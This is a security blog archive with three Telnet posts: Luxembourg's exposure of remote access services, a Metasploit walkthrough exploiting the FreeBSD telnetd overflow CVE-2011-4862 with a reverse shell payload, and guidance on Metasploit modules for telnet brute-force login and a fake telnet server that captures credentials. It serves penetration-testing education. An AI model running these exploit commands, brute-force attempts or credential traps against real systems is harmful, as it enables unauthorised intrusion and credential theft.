Tag Archives: Telnet

Luxembourg Critical Remote Management Applications Attack Surface

MS12-020 patch is now out since a month with associate DoS PoC’s available for pen tester’s and other populations how have not equivalent ethic. Lot of articles, blog posts have been written around CVE-2012-0002, a vulnerability discovered by Luigi Auriemma in May 2011, reported to ZDI in August 2011 and disclosed in a coordinated manner in March 2012.

One of these MS12-020 related articles was written by Dan Kaminsky, “RDP and the Critical Server Attack Surface“. This blog post fact to remember that some applications are more critical than others due to they’re roles and they’re expositions to Internet.

Dan has scan around 300 million IPs, who are representing around 8.3% of the Internet, and 415 thousands showed an open RDP (3389/TCP), a ratio of 0,14%. By extrapolation Dan has arrived to around 5 million RDP endpoints on the Internet. Hopefully for the Internet community (should I say for the sysadmins ?), despite the efforts by security researches (most on freenode #ms12-020), MS12-020 has “only” lead to a DoS exploit. Potentially 5 million BSoD’s (Blue Screen of Death), it is a blessing in disguise ?

In his article Dan Kaminsky has also remember us that other critical server attack surfaces are existing on Internet, such as TCP/IP, HTTP, SSL, SSH, DNS or SMTP, and that all these applications are playing potential essential roles for business.

I have done the same study for the Luxembourg landscape with around 550 000 IP addresses, but before giving my results I would like to explain you what is Luxembourg 🙂

If you don’t know, Luxembourg has the higher GDP in Europe and is classified in the top 3 of the list of countries by GDP per capita (Wikipedia source). Also more than 90% of population is using Internet and 82% of the population connect to Internet daily. Luxembourg became the geography with the highest ratio of malicious email activity in February 2012 regarding Symantec Intelligence Report.

Also Luxembourg has a total balance sheet of Euro 776 billion in credit institutions and the Luxembourg banking sector comprised 143 credit institutions from over 20 different countries (pwc Luxembourg source). All of these credit institutions are under the CSSF (Commission de Surveillance du Secteur Financier) surveillance and most of them are delegating their IT management to PSF (Professionals of the Financial Sector), also known as “Primary IT systems operators” and “Secondary IT systems and network operators“.

In conclusion most of the IP addresses assigned to Luxembourg have a potential high asset value for bad guys. Luxembourg IP addresses ranges assigned for Internet broadband access, have surely a bigger return on investment compared to other countries in case phishing or malware campaigns. Also IP addresses ranges assigned to professionals of the financial sector are surely hosting e-banking or fund transactions infrastructures, a prime target for cyber crime.

So, what are the results for Luxembourg, a country how normally should have a less ratio of exposition than others du to the fact that an IP address has a higher asset value than 300 million addresses arbitrary scanned. I have only focus on applications equivalent to RDP, these applications are known as “Remote Access Services” (RDP, ssh, telnet, VNC, PCAnywhere, Citrix, etc.).

In “2012 Verizon Data Breach Report“, “Remote Access Services” are noted “as continuing their rise in prevalence, as hacking vector, accounting for 88% of all breaches leveraging hacking techniques – more than any other vector“. Remote services accessible from the entire Internet, combined non patched applications, with default, weak, or stolen credentials continue to plague organizations. Scripted attacks seeking victims with known remote access ports, followed with issuance of known default vendor credentials, allow for targets of opportunity to be discovered and compromised in an automated and efficient manner.

Do you remember, Dan Kaminsky had discovered a ratio of 0,14% of open RDP on 300 million IPs. In Luxembourg, this ratio is 0,26%, twice Dan ratio. For ssh the ratio of open port is 0,79%, for telnet the ratio is 0,31% (still open telnet despite best practices ?), for VNC the ratio is 0,06% and for PCAnywhere the ratio is 0,02% (still open PCAnywhere despite the leaked source code ?).

Shouldn’t Luxembourg have a less ratios of open ports for “Remote Access Services” ? I think YES. But why are these ratios so important ? Surely because Security has fail in his mission, surely because Security is still understood as technical game and not as an insurance to protect the value of assets. Also maybe the cause could be that Internet is growing to fast and that the Internet grow speed don’t give the time to learn from errors. Internet maybe distort the reality, the memory and the time.

Just to remember a small list of vulnerabilities or backdoor’s how have target these critical remote server surfaces :

2012 :

  • SSH : cisco-sa-20120328-ssh – Cisco IOS Software Reverse SSH Denial of Service Vulnerability
  • RDP : CVE-2012-0002 – Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability
  • PCAnywhere : OSVDB-79412 – PCAnywhere 12.5.0 build 463 Denial of Service
2011 :
  • Telnet : CVE-2011-4862 – FreeBSD Telnet Service Encryption Key ID Buffer Overflow
  • FTP : OSVDB-73573 – vsftpd-2.3.4 backdoor
  • SSH : EBD-ID-17462 – OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
2010 :
  • SMTP : CVE-2010-4344 – Exim4 <= 4.69 string_format Function Heap Buffer Overflow
  • FTP : OSVDB-69562 –  ProFTPD 1.3.3c compromised source remote root Trojan
  • FTP : CVE-2010-3867 – ProFTPD IAC Remote Root Exploit
  • FTP : OSVDB-62134 – Easy FTP Server v1.7.0.11 Multiple Commands Remote Buffer Overflow Exploit (Post Auth)
2009 :
  • FTP : CVE-2009-3023 – Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)
2008 :
  • DNS : CVE-2008-1447 – Remote DNS Cache Poisoning Flaw Exploit
  • SSH : CVE-2008-0166 – Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
Etc. Etc.

CVE-2011-4862 FreeBSD Telnet Buffer Overflow Metasploit Demo

Timeline :

Vulnerability exploited in the wild
Public release of the vulnerability the 2011-12-23
Metasploit PoC provided the 2011-12-27

PoC provided by :

Jaime Penalba Estebanez
Brandon Perry
Dan Rosenberg
hdm

Reference(s) :

CVE-2011-4862
OSVDB-78020
FreeBSD-SA-11:08.telnetd

Affected version(s) :

All supported versions of FreeBSD.

Tested on FreeBSD 8.1-RELEASE

Description :

This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.

Commands :

use exploit/freebsd/telnet/telnet_encrypt_keyid
set RHOST 192.168.178.112
SET PAYLOAD bsd/x86/shell/reverse_tcp
set LHOST 192.168.178.100
exploit

id
uname -a

Metasploit Telnet Auxiliary Modules

Metasploit provide some Telnet auxiliary modules who will permit you to scan the running version, do brute force login and simulate fake Telnet server.

You can find all these auxiliary modules through the Metasploit search command.

Telnet version scanner (telnet_version)

To invoke this auxiliary module just type the following command :

Just provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (file:/tmp/ip_addresses.txt). In order to parallelize version scans, just increase the number of concurrent threads by setting the “THREADS” variable. In order to reduce the Telnet connexion timeout, decrease the value of “TIMEOUT” variable.

Telnet authentication brute force login (telnet_login)

To invoke this auxiliary module just type the following command :

This module attempts to authenticate against a Telnet server using username and password combinations indicated by the “USER_FILE“, “PASS_FILE“, and “USERPASS_FILE” options. Metasploit provide files for “USER_FILE” (/opt/metasploit3/msf3/data/wordlists/unix_users.txt) and “PASS_FILE” (/opt/metasploit3/msf3/data/wordlists/unix_passwords.txt). You can also use SkullSecurity password lists, or my own list how is updated regularly. In order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable. Provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be a an unique IP address, an IP addresses range or a file. Each discovered matching login and password will create a Metasploit session.

Valid login attempts are displayed in green and non valid in red.

Fake Telnet server emulator (telnet)

To invoke this auxiliary module just type the following command :

This module emulate a fake Telnet server in order to capture authentication credentials.